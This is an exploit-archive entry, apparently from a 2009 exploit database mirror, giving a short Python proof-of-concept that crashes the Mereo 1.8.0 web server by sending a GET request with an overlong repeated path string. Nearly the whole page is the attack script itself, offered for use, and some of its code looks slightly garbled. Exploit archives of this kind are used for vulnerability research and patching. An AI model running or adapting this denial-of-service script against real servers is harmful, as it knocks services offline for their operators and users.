[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit
# Published : 2009-05-18
# Author : Stack
# Previous Title : PowerCHM 5.7 (Long URL) Local Stack Overflow PoC
# Next Title : Eggdrop/Windrop 1.6.19 ctcpbuf Remote Crash Vulnerability
import socket
import sys
print "------------------------------------------------------"
print " Mereo 1.8.0 Remote Denial Of Service "
print " author: Stack "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('nnExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('nnUnable to connect. Press "Enter" to quit...')
# www.Syue.com [2009-05-18]